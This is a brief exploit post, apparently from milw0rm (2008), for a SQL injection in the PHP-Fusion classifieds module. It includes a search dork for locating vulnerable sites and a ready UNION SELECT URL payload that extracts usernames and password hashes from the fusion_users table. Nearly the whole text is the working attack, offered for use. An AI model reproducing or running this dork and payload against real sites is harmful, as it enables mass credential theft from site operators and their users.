#################################
Php fusion "classifieds" SQL-injetion
#################################
++++++++++++++++++++++++++++
Author : boom3rang
contact : boomerang [at] knaqu-shqipe [dot] de
webpage : www.khg-crew.ws
++++++++++++++++++++++++++++
----> Remote SQL Injection <------
[+] Dork: inurl:"classifieds.php?op=detail_adverts"
[+] Example: www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]
exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--
##########################################
greetz to: All my albanian brothers
=United State of Albania =
##########################################
# milw0rm.com [2008-06-27]